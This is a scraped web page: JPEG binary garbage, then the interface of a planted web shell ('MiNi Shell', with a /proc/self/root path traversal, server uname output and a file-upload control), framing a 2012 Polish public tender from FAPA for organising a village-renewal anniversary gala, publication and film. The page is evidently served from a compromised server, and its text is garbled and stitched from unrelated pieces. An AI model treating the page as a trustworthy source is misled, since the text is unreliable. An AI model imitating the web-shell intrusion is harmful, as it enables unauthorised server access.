JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120719/260090-N-2012.html

<p class="kh_header"><b>Warszawa: Zakup usług polegających na kompleksowej organizacji projektu: Obchody XV - lecia Odnowy Wsi w Polsce</b><br>
<b>Numer ogłoszenia: 260090 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 623 19 01, faks 22 623 19 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fapa.com.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.fapa.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług polegających na kompleksowej organizacji projektu: Obchody XV - lecia Odnowy Wsi w Polsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup usług polegających na zapewnieniu kompleksowej realizacji projektu: Obchody XV - lecia Odnowy Wsi w Polsce, zwanego dalej Projektem. Celem projektu jest promocja dobrych praktyk w zakresie Odnowy Wsi realizowanych ze środków lokalnych, gminnych, samorządów województwa, krajowych i unijnych na rzecz wsparcia oddolnych  inicjatyw społecznych realizowanych w celu poprawy jakości życia mieszkańców na obszarach wiejskich. W celu realizacji przedmiotu zamówienia Wykonawca zorganizuje Biuro Projektu, zwane dalej Biurem, odpowiedzialne za całość prac związanych z realizacją Projektu. W celu sprawnego funkcjonowania Biura Wykonawca zapewni: a) zespół składający się z osób zapewniających prawidłową i terminową realizację Projektu; b) minimum jeden numer telefonu stacjonarnego, numer telefonu komórkowego, numer faksu oraz adres mailowy i korespondencyjny; c) organizację pracy, która umożliwi łatwy kontakt z przedstawicielami Biura. Czas odpowiedzi na zapytanie mailowe nie może przekroczyć dwóch dni roboczych; Przedstawiciele Biura będą ściśle współpracować z Zamawiającym i na bieżąco dostarczać wszelkich informacji o realizacji Projektu. Podstawowe zadania Biura: 1. Opracowanie merytoryczne, graficzne, skład, korekta, łamanie oraz druk i dystrybucja publikacji w formie książki pt.: XV-lecie Odnowy Wsi w Polsce. W ramach tego zadania Wykonawca zapewni: a) redakcję naukową publikacji, b) zespół redakcyjny, posiadający przygotowanie merytoryczne zgodne z tematyką publikacji, c) opracowanie merytoryczne publikacji, zgodnie z wymaganiami określonymi w Załączniku nr 6 do SIWZ, d)	opracowanie graficzne publikacji, zgodnie z wymaganiami określonymi w Załączniku nr 6 do SIWZ, e) skład publikacji, f) łamanie tekstu, g) druk publikacji w nakładzie 5000 egzemplarzy, po co najmniej 110 stron każda, zgodnie z poniższymi wymaganiami: - okładka laminowana, - papier o gramaturze co najmniej 115 g/m2 (kreda półmat), - wszelkie zdjęcia grafiki i schematy w kolorze, h) dystrybucję publikacji, zgodnie z wymaganiami określonymi w Załączniku nr 7 do SIWZ. Publikacja zawierać będzie stałą i trwałą wizualizację sloganów oraz logotypów określonych w Załączniku nr 8 do SIWZ. Ostateczny wybrany przez Wykonawcę skład zespołu redakcyjnego (wraz z załączonymi CV jego członków) zostanie przedstawiony Zamawiającemu na co najmniej 7 dni przed rozpoczęciem prac nad publikacją. Wykonawca przedstawi Zamawiającemu pełną i ostateczną wersję publikacji w wersji papierowej co najmniej 7 dni przed rozpoczęciem jej druku i dystrybucji. Wykonawca wykona niniejsze zadanie w terminie 30.11.2012 r. 2. Produkcja oraz dystrybucja filmu pod tytułem XV-lecie Odnowy Wsi w Polsce. Celem realizacji filmu jest przedstawienie idei odnowy wsi, procesu aktywizacji mieszkańców obszarów wiejskich, wyników realizacji regionalnych programów w Polsce. Film musi mieć charakter reportażu, z oprawą narratorską lektora. Zdjęcia filmowe obrazować muszą m.in.: działania samorządów wojewódzkich wdrażających regionalne Programy Odnowy Wsi, warsztaty dla sołectw przystępujących do Programu Odnowy Wsi, szkolenia, konkursy, przedsięwzięcia promujące ideę odnowy wsi całym kraju oraz oddolnie realizowane przez społeczność wiejską (grupy i  stowarzyszenia odnowy wsi) projekty przyczyniające się do poprawy i podniesienia estetyki wsi,  warunków życia mieszkańców, modernizacji infrastruktury technicznej. Film musi przedstawiać projekty kultywujące lokalne tradycje, tworzące miejsca spotkań mieszkańców.  W filmie muszą znaleźć się obrazujące materiał filmowy krótkie wypowiedzi ekspertów, animatorów i liderów odnowy wsi. Długość filmu: 15 minut Minimalne wymagania techniczne: określa Załącznik nr 9 do SIWZ. Materiał filmowy oraz nośnik zawierać będą stałą i trwałą wizualizację sloganów oraz logotypów określonych w Załączniku nr 8 do SIWZ. Wykonawca przed rozpoczęciem dystrybucji przedstawi Zamawiającemu wykonany film na cyfrowym nośniku danych w terminie do dnia 30.09.2012 r. Wykonawca zapewni dystrybucję filmu zgodnie z wymaganiami określonymi z Załączniku nr 7A do SIWZ. Wykonawca wykona niniejsze zadanie w terminie 10.10.2012 r. 3. Kompleksowa organizacja i realizacja gali XV-lecia Odnowy Wsi w Polsce. W ramach tego zadania Wykonawca zapewni: a) nabór uczestników gali - do udziału w gali zaproszeni zostaną przedstawiciele: - Kancelarii Prezydenta Rzeczpospolitej Polskiej, - Rządu Rzeczpospolitej Polskiej, - Europejskiego Stowarzyszenia Rozwoju Obszarów Wiejskich i Odnowy Wsi ARGE w Wiedniu, - regionów partnerskich województwa opolskiego (w szczególności landu Nadrenia - Palatynat), - Ministerstwa Rolnictwa i Rozwoju Wsi, - Fundacji Programów Pomocy dla Rolnictwa FAPA, - ekspertów z dziedziny rozwoju obszarów wiejskich, - województw - po minimum dwie osoby z każdego z województw oraz po minimum dziesięć osób (liderzy odnowy wsi, sołtysi, działacze społeczni) z województw, mających dorobek w postaci regionalnego Programu Odnowy Wsi, bądź prowadzących wybrane działania charakterystyczne dla Programów Odnowy Wsi, to jest województw: dolnośląskiego, wielkopolskiego, opolskiego, podkarpackiego, śląskiego,  pomorskiego, kujawsko-pomorskiego, świętokrzyskiego, zachodniopomorskiego, - instytucji kluczowych dla rozwoju obszarów wiejskich (Agencji Restrukturyzacji i Modernizacji Rolnictwa, Agencji Rynku Rolnego, Instytutu Rozwoju Wsi i Rolnictwa PAN oraz Centrum Doradztwa Rolniczego), - sołectw i gmin uczestniczących w opolskim Programie Odnowy Wsi. Liczbę uczestników gali szacuje się na od 300 do 500 osób. b) salę konferencyjną, zgodnie z poniższymi wymaganiami:- sala musi się znajdować w granicach administracyjnych województwa opolskiego, na terenie gminy wiejskiej lub miejsko - wiejskiej uczestniczącej w Programie Odnowy Wsi, - pojemność sali: co najmniej 300 a maksymalnie 500 miejsc siedzących, c) realizację programu gali XV-lecia Odnowy Wsi w Polsce, stanowiącego Załącznik nr 10 do SIWZ, d) uroczystą kolację (co najmniej: stek z łososia w ziołach, roladki z pstrąga, golonka pieczona, grillowany karczek, prosię pieczone faszerowane, bigos, kaszanka w jabłku, klopsiki w sosie pieczarkowym, sałatka grecka z fetą, ziemniaki opiekane, sałata z sosem winegret, surówka z kiszonej kapusty; zimne przekąski tj. deski mięs i serów, koreczki, płyty swojskich wędlin, jajko w majonezie, śledź pod pierzynką, kołocz śląski, kawa, herbata, soki, woda mineralna) dla wszystkich uczestników gali (co najmniej 300 a maksymalnie 500 osób), e) tłumaczenie konsekutywne z języka polskiego na język niemiecki podczas i w związku z galą, f) poczęstunek kawowy (co najmniej: kawa, herbata, woda mineralna gazowana oraz niegazowana, kołocz śląski z serem, makiem i jabłkiem dla wszystkich uczestników gali. Listę osób, które zostaną zaproszone do uczestnictwa w gali, Wykonawca przedstawi Zamawiającemu co najmniej 7 dni przed wysłaniem zaproszeń. Listę prelegentów Wykonawca przedstawi Zamawiającemu niezwłocznie po jej zatwierdzeniu, ale nie później niż 7 dni przed terminem gali. Wykonawca zorganizuje galę w dniu 19 października 2012 r. w godzinach 16:00 - 20:00. 4. Kompleksowa organizacja i realizacja warsztatów. Warsztaty zorganizowanie zostaną w dniu 18 października 2012 r., w miejscu organizacji gali, o której mowa w pkt. III.4. Celem warsztatów jest określenie potrzeb i oczekiwań dotyczących procesu odnowy wsi. W ramach tego zadania Wykonawca zapewni: a) nabór uczestników warsztatów, zgodnie z poniższymi wymaganiami: - w warsztatach weźmie udział 170 osób, - w warsztatach uczestniczyć będą m.in. liderzy i samorządowcy z województw realizujących Programy Odnowy Wsi, b) trzy sale konferencyjne wyposażone w sprzęt multimedialny, w zakresie niezbędnym do przeprowadzenia warsztatów, c) nabór oraz wynagrodzenie moderatorów warsztatów, d) obiad (co najmniej: rosół z makaronem, rolada śląska z kluskami i czerwoną kapustą, soki, woda mineralna) dla wszystkich uczestników warsztatów (170 osób), e) kolację (co najmniej: duet z piersi kurczaka z karczkiem podany z opiekanymi ziemniakami i zestawem surówek, soki, woda mineralna) dla wszystkich uczestników warsztatów (170 osób), f) realizację warsztatów zgodnie z programem warsztatów, stanowiącym Załącznik nr 11 do SIWZ oraz w sposób odpowiadający podstawowym założeniom warsztatów, stanowiącym Załącznik nr 12 do SIWZ, Wykonawca przedstawi Zamawiającemu listę moderatorów warsztatów (wraz z załączonymi CV), z podziałem na poszczególne grupy tematyczne najpóźniej 7 dni przez terminem realizacji warsztatów. Wykonawca przedstawi Zamawiającemu listę uczestników warsztatów, z podziałem na poszczególne grupy tematyczne najpóźniej 7 dni przez terminem realizacji warsztatów.5. Kompleksowa organizacja i realizacja wyjazdów studyjnych. Wyjazdy studyjne zostaną zrealizowane w ramach gali XV-lecia Odnowy Wsi w Polsce, o której mowa w pkt. III.3. Celem wyjazdów będzie prezentacja najciekawszych projektów oraz dokonań liderów opolskich sołectw, jak również wymiana wiedzy i doświadczeń w zakresie realizacji idei odnowy wsi. W ramach tego zadania Wykonawca zapewni: a) nabór uczestników wyjazdów studyjnych, zgodnie z poniższymi wymaganiami: - liczba uczestników wyjazdów wyniesie 120 osób (trzy trasy studyjne, po maksymalnie 40 osób na każdą trasę), - uczestnikami wyjazdów będą uczestnicy warsztatów, o którym mowa w pkt. III.4 SIWZ, b) realizację wyjazdów studyjnych, zgodnie z Załącznikiem nr 13 do SIWZ, c) wyżywienie (co najmniej: lunch z potrawami regionalnymi oraz ciastami sporządzonymi przez lokalną społeczność oraz woda mineralna, soki, kawa, herbata) dla uczestników wyjazdów studyjnych w jednym z wizytowanych sołectw. Wykonawca przedstawi Zamawiającemu listę uczestników wyjazdów studyjnych najpóźniej 7 dni przed terminem realizacji wyjazdów. Wyjazdy studyjne zostaną zrealizowane w dniu 19 października 2012 r. w godz. od 09:00 do 14:00. 6. Noclegi. W ramach tego zadania Wykonawca zapewni: a) jeden nocleg wraz ze śniadaniem wszystkich uczestników warsztatów, o których mowa w pkt. III.4, zgodnie z poniższymi wymaganiami: - termin: noc z 18 na 19 października 2012 r., - miejsce: obiekt znajdujący się w granicach administracyjnych powiatu opolskiego, - ilość osób: 170 Nocleg zostanie zapewniony w pokojach jedno- i/lub dwuosobowych, w hotelu o standardzie co najmniej trzygwiazdkowym lub innym obiekcie o równorzędnym standardzie. b) jeden nocleg wraz ze śniadaniem uczestników gali, o której mowa w pkt. III.3 oraz wyjazdów studyjnych, o których mowa w pkt. III.5, zgodnie z poniższymi wymaganiami: - termin: noc z 19 na 20 października 2012 r., - miejsce: obiekt znajdujący się w granicach administracyjnych powiatu opolskiego, - ilość osób: 170 Nocleg zostanie zapewniony w pokojach jedno- i/lub dwuosobowych, w hotelu o standardzie co najmniej trzygwiazdkowym lub innym obiekcie o równorzędnym standardzie. 7. Transport osób. W ramach tego zadania Wykonawca zapewni: a) Transport uczestników warsztatów, o których mowa w pkt. III.4 z miejsca zakwaterowania do miejsca realizacji warsztatów i z powrotem, zgodnie z programem warsztatów w dniu 18.10.2012 r., b) transport uczestników wyjazdów studyjnych i gali, o których mowa w pkt. III.3 oraz III.5 na trasach i zgodnie z programem wyjazdów i gali, stanowiącym Załącznik nr 10 oraz nr 13 do SIWZ w dniu 19.10.2012 r., 8. Wykonawca wykona niniejsze zamówienie w porozumieniu z partnerami projektu. Partnerami projektu są: 1. Marszałkowie województw: a) dolnośląskiego, b) kujawsko-pomorskiego, c) opolskiego, d) podkarpackiego, e) pomorskiego, f) śląskiego, g) świętokrzyskiego, h) wielkopolskiego, i) zachodniopomorskiego 2. Opolski Urząd Wojewódzki, 3. Europejskie Stowarzyszenie Rozwoju Wsi i Obszarów Wiejskich ARGE, 4. Gminy oraz miasta: a) Urząd Miejski w Prószkowie, b) Urząd Gminy w Popielowie, c) Urząd Miejski w Strzelcach Opolskich, d) Urząd Miejski w Gogolinie, e) Urząd Miejski w Białej, f) Urząd Gminy w Łubniach, g) Urząd Miejski w Korfantowie, h) Urząd Gminy Dzierżoniów. Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy, stanowiącym załącznik nr 14 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.60.00-0, 55.10.00.00-1, 55.30.00.00-3, 60.00.00.00-9, 79.54.00.00-1, 22.10.00.00-1, 79.82.25.00-7, 79.82.20.00-2, 79.82.11.00-6, 92.11.12.50-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata - w tym okresie, wykonał lub wykonuje, co najmniej 3 (trzy) usługi o wartości każdej usługi nie mniejszej niż 50 000,00 zł brutto każda (słownie: pięćdziesiąt tysięcy złotych 00/100), z których każda polegała na zapewnieniu kompleksowej organizacji konferencji lub innego wydarzenia o oficjalnym charakterze, obejmującej łącznie co najmniej wyżywienie oraz zakwaterowanie uczestników i każda z tych usług organizowana była dla co najmniej 100 osób. Wykonanie jednej usługi jest równoznaczne z wykonaniem jednej umowy (jednego zamówienia na rzecz jednego Zamawiającego).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej: jedną osobą posiadającymi wiedzę i doświadczenie niezbędne do wykonania kompleksowej organizacji i realizacji konferencji lub innego wydarzenia o oficjalnym charakterze, jedną osobą posiadającą wiedzę, doświadczenie oraz wykształcenie odpowiednie do kierowania zespołem redakcyjnym publikacji, o której mowa w pkt. III.1 SIWZ, jedną osobą posiadającą wiedzę i doświadczenie niezbędne do prawidłowego wykonania usługi produkcji filmu, o którym mowa w punkcie III.2 SIWZ, jedną osobą posiadającą kwalifikacje do wykonywania tłumaczenia konsekutywnego z języka polskiego na język niemiecki podczas i w związku z galą, o której mowa w pkt. III.3 SIWZ. Wykonawca może zaproponować większą ilość osób uczestniczących w realizacji niniejszego zamówienia, jednakże w takim przypadku, każda osoba wskazana dodatkowo ponad wymagane minimum, musi spełniać powyższy warunek udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fapa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA
ul. Wspólna 30
00-930 Warszawa
www.fapa.com.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:00, miejsce: Fundacja Programów Pomocy dla Rolnictwa FAPA
ul. Wspólna 30
00-930 Warszawa
sekretariat - pok. 253.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Schemat III Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com